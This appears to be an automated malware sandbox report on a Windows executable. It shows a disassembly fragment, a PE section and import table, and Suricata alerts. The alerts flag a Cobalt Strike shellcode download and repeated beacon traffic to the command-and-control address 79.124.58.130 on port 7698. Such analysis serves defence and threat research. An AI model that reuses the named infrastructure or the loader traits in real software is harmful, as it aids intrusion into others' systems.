call 00007F1F98E0546Fh
call 00007F1F98E04C5Ah
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F1F98E06934h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F1F98E04FB9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
jmp ecx
dec eax
arpl word ptr [00002AC2h], ax
test eax, eax
jle 00007F1F98E05008h
cmp dword ptr [00002ABBh], 00000000h
jle 00007F1F98E04FFFh
dec eax
mov edx, dword ptr [00007CFEh]
dec eax
mov dword ptr [ecx+eax], edx
dec eax
mov edx, dword ptr [00007CFBh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9000	0x8d8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6000	0x2b8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5060	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9224	0x1e8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20a8	0x2200	3040ba596609d0f7ba50ac030468b13e	False	0.5708869485294118	data	5.9208685532060095	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4000	0x4f0	0x600	29abc4b4f17b0186357101b92290ca43	False	0.6477864583333334	data	5.855312600773697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x5000	0x910	0xa00	b02c91451e7abad85f4a5bbe48fd6333	False	0.2421875	data	4.472912660223878	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x6000	0x2b8	0x400	ad5ec754cf0e204a3a3c39436081f3bc	False	0.380859375	data	2.9668653207491333	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x7000	0x238	0x400	6ce9e303fb86766d702ecb2b174cf348	False	0.2578125	data	2.6337753778508075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x8000	0x9d0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x9000	0x8d8	0xa00	ec8dedb62953693cf02784f71f75d547	False	0.323828125	data	3.7083607069283806	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0xa000	0x68	0x200	52d79e9aecf5d5c3145d3ec54aa197a8	False	0.0703125	data	0.2709192282599745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xb000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile

msvcrt.dll

__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-23T17:25:36.588106+0200	2035442	ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1	1	79.124.58.130	7698	192.168.2.8	49705	TCP
2024-10-23T17:25:38.970068+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49706	79.124.58.130	7698	TCP
2024-10-23T17:25:39.967781+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49707	79.124.58.130	7698	TCP
2024-10-23T17:25:40.996158+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49708	79.124.58.130	7698	TCP
2024-10-23T17:25:42.007761+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49709	79.124.58.130	7698	TCP
2024-10-23T17:25:43.012519+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49710	79.124.58.130	7698	TCP
2024-10-23T17:25:44.025256+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49711	79.124.58.130	7698	TCP
2024-10-23T17:25:45.024263+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49712	79.124.58.130	7698	TCP
2024-10-23T17:25:46.035259+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49713	79.124.58.130	7698	TCP
2024-10-23T17:25:47.104754+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49714	79.124.58.130	7698	TCP
2024-10-23T17:25:48.111718+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49715	79.124.58.130	7698	TCP
2024-10-23T17:25:49.120499+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49716	79.124.58.130	7698	TCP
2024-10-23T17:25:50.115733+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49718	79.124.58.130	7698	TCP
2024-10-23T17:25:51.151556+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49720	79.124.58.130	7698	TCP
2024-10-23T17:25:52.151334+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49722	79.124.58.130	7698	TCP
2024-10-23T17:25:53.159459+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49723	79.124.58.130	7698	TCP
2024-10-23T17:25:54.174468+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49724	79.124.58.130	7698	TCP
2024-10-23T17:25:55.194523+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49725	79.124.58.130	7698	TCP
2024-10-23T17:25:56.198742+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49726	79.124.58.130	7698	TCP
2024-10-23T17:25:57.433355+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49727	79.124.58.130	7698	TCP
2024-10-23T17:25:58.445115+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49728	79.124.58.130	7698	TCP
2024-10-23T17:25:59.801063+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49729	79.124.58.130	7698	TCP
2024-10-23T17:26:00.814684+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49730	79.124.58.130	7698	TCP
2024-10-23T17:26:01.824560+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49731	79.124.58.130	7698	TCP
2024-10-23T17:26:02.853390+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49732	79.124.58.130	7698	TCP
2024-10-23T17:26:03.881706+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49733	79.124.58.130	7698	TCP
2024-10-23T17:26:04.894871+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49734	79.124.58.130	7698	TCP
2024-10-23T17:26:05.900810+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49735	79.124.58.130	7698	TCP
2024-10-23T17:26:06.912017+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49736	79.124.58.130	7698	TCP
2024-10-23T17:26:08.179524+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49737	79.124.58.130	7698	TCP
2024-10-23T17:26:09.248116+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49738	79.124.58.130	7698	TCP
2024-10-23T17:26:10.255790+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49739	79.124.58.130	7698	TCP
2024-10-23T17:26:11.324204+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49740	79.124.58.130	7698	TCP
2024-10-23T17:26:12.359042+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49741	79.124.58.130	7698	TCP
2024-10-23T17:26:13.360299+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49742	79.124.58.130	7698	TCP
2024-10-23T17:26:14.356397+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49743	79.124.58.130	7698	TCP
2024-10-23T17:26:15.357630+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49744	79.124.58.130	7698	TCP
2024-10-23T17:26:16.494346+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49745	79.124.58.130	7698	TCP
2024-10-23T17:26:17.505655+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49746	79.124.58.130	7698	TCP
2024-10-23T17:26:18.522596+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49747	79.124.58.130	7698	TCP
2024-10-23T17:26:19.570341+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49748	79.124.58.130	7698	TCP
2024-10-23T17:26:20.597842+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49749	79.124.58.130	7698	TCP
2024-10-23T17:26:21.602498+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49750	79.124.58.130	7698	TCP
2024-10-23T17:26:22.639247+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49751	79.124.58.130	7698	TCP
2024-10-23T17:26:23.660332+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49752	79.124.58.130	7698	TCP
2024-10-23T17:26:24.693927+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49753	79.124.58.130	7698	TCP
2024-10-23T17:26:25.699416+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49754	79.124.58.130	7698	TCP
2024-10-23T17:26:26.710638+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49755	79.124.58.130	7698	TCP
2024-10-23T17:26:27.702428+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49756	79.124.58.130	7698	TCP
2024-10-23T17:26:28.721261+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49757	79.124.58.130	7698	TCP
2024-10-23T17:26:29.741853+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49759	79.124.58.130	7698	TCP
2024-10-23T17:26:30.755425+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49760	79.124.58.130	7698	TCP
2024-10-23T17:26:31.769138+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49761	79.124.58.130	7698	TCP
2024-10-23T17:26:32.782094+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49762	79.124.58.130	7698	TCP
2024-10-23T17:26:33.797480+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49763	79.124.58.130	7698	TCP
2024-10-23T17:26:34.808584+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49764	79.124.58.130	7698	TCP
2024-10-23T17:26:36.383218+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49765	79.124.58.130	7698	TCP
2024-10-23T17:26:37.399087+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49766	79.124.58.130	7698	TCP
2024-10-23T17:26:38.433750+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49767	79.124.58.130	7698	TCP
2024-10-23T17:26:39.437139+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49768	79.124.58.130	7698	TCP
2024-10-23T17:26:40.442632+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49769	79.124.58.130	7698	TCP
2024-10-23T17:26:41.458635+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49770	79.124.58.130	7698	TCP
2024-10-23T17:26:42.475434+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49771	79.124.58.130	7698	TCP
2024-10-23T17:26:43.479443+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49772	79.124.58.130	7698	TCP
2024-10-23T17:26:44.485483+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49773	79.124.58.130	7698	TCP
2024-10-23T17:26:45.500311+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49774	79.124.58.130	7698	TCP
2024-10-23T17:26:46.504944+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49775	79.124.58.130	7698	TCP
2024-10-23T17:26:47.538919+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49776	79.124.58.130	7698	TCP
2024-10-23T17:26:48.531587+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49777	79.124.58.130	7698	TCP
2024-10-23T17:26:49.566807+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49778	79.124.58.130	7698	TCP
2024-10-23T17:26:50.580700+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49779	79.124.58.130	7698	TCP
2024-10-23T17:26:51.594679+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49780	79.124.58.130	7698	TCP
2024-10-23T17:26:52.623325+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49782	79.124.58.130	7698	TCP
2024-10-23T17:26:53.633985+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49783	79.124.58.130	7698	TCP
2024-10-23T17:26:54.642433+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49785	79.124.58.130	7698	TCP
2024-10-23T17:26:55.652251+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49786	79.124.58.130	7698	TCP
2024-10-23T17:26:56.696738+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49787	79.124.58.130	7698	TCP
2024-10-23T17:26:57.724368+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49788	79.124.58.130	7698	TCP
2024-10-23T17:26:58.789965+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49789	79.124.58.130	7698	TCP
2024-10-23T17:26:59.808899+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49790	79.124.58.130	7698	TCP
2024-10-23T17:27:00.825530+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49791	79.124.58.130	7698	TCP
2024-10-23T17:27:01.841569+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49792	79.124.58.130	7698	TCP
2024-10-23T17:27:02.863554+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49793	79.124.58.130	7698	TCP
2024-10-23T17:27:04.189468+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49794	79.124.58.130	7698	TCP
2024-10-23T17:27:05.201000+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49795	79.124.58.130	7698	TCP
2024-10-23T17:27:06.224172+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49796	79.124.58.130	7698	TCP
2024-10-23T17:27:07.227454+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49797	79.124.58.130	7698	TCP
2024-10-23T17:27:08.266186+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49798	79.124.58.130	7698	TCP
2024-10-23T17:27:09.269675+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49799	79.124.58.130	7698	TCP
2024-10-23T17:27:10.322900+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49800	79.124.58.130	7698	TCP
2024-10-23T17:27:11.345569+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49801	79.124.58.130	7698	TCP
2024-10-23T17:27:12.369328+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49802	79.124.58.130	7698	TCP
2024-10-23T17:27:13.371605+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49803	79.124.58.130	7698	TCP
2024-10-23T17:27:14.388676+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49804	79.124.58.130	7698	TCP
2024-10-23T17:27:15.432912+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49805	79.124.58.130	7698	TCP
2024-10-23T17:27:16.449580+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49806	79.124.58.130	7698	TCP
2024-10-23T17:27:17.601482+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49807	79.124.58.130	7698	TCP
2024-10-23T17:27:18.617676+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49808	79.124.58.130	7698	TCP
2024-10-23T17:27:19.655348+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49809	79.124.58.130	7698	TCP
2024-10-23T17:27:20.911521+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49810	79.124.58.130	7698	TCP
2024-10-23T17:27:21.921622+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49811	79.124.58.130	7698	TCP
2024-10-23T17:27:22.958194+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49812	79.124.58.130	7698	TCP
2024-10-23T17:27:23.970367+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49813	79.124.58.130	7698	TCP
2024-10-23T17:27:24.995454+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49814	79.124.58.130	7698	TCP
2024-10-23T17:27:26.027701+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49815	79.124.58.130	7698	TCP
2024-10-23T17:27:27.089596+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49816	79.124.58.130	7698	TCP
2024-10-23T17:27:28.115806+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49817	79.124.58.130	7698	TCP
2024-10-23T17:27:29.123579+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49818	79.124.58.130	7698	TCP
2024-10-23T17:27:30.385229+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49819	79.124.58.130	7698	TCP
2024-10-23T17:27:31.432189+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49820	79.124.58.130	7698	TCP
2024-10-23T17:27:32.472746+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49821	79.124.58.130	7698	TCP
2024-10-23T17:27:33.482633+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49822	79.124.58.130	7698	TCP
2024-10-23T17:27:34.493467+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49823	79.124.58.130	7698	TCP
2024-10-23T17:27:35.606173+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49824	79.124.58.130	7698	TCP
2024-10-23T17:27:36.626968+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49825	79.124.58.130	7698	TCP
2024-10-23T17:27:37.630738+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49826	79.124.58.130	7698	TCP
2024-10-23T17:27:38.650085+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49827	79.124.58.130	7698	TCP
2024-10-23T17:27:39.664723+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49828	79.124.58.130	7698	TCP
2024-10-23T17:27:40.698781+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49829	79.124.58.130	7698	TCP
2024-10-23T17:27:41.969457+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49830	79.124.58.130	7698	TCP
2024-10-23T17:27:42.985382+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49831	79.124.58.130	7698	TCP
2024-10-23T17:27:44.004370+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49832	79.124.58.130	7698	TCP
2024-10-23T17:27:45.002587+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49833	79.124.58.130	7698	TCP
2024-10-23T17:27:46.023594+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49834	79.124.58.130	7698	TCP
2024-10-23T17:27:47.030003+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49835	79.124.58.130	7698	TCP
2024-10-23T17:27:48.041715+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49836	79.124.58.130	7698	TCP
2024-10-23T17:27:49.042900+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49837	79.124.58.130	7698	TCP
2024-10-23T17:27:50.079596+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49838	79.124.58.130	7698	TCP
2024-10-23T17:27:51.102594+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49839	79.124.58.130	7698	TCP
2024-10-23T17:27:52.103525+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49840	79.124.58.130	7698	TCP
2024-10-23T17:27:53.098405+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49841	79.124.58.130	7698	TCP
2024-10-23T17:27:54.095582+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49842	79.124.58.130	7698	TCP
2024-10-23T17:27:55.111708+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49843	79.124.58.130	7698	TCP
2024-10-23T17:27:56.127798+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49844	79.124.58.130	7698	TCP
2024-10-23T17:27:57.402822+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49845	79.124.58.130	7698	TCP
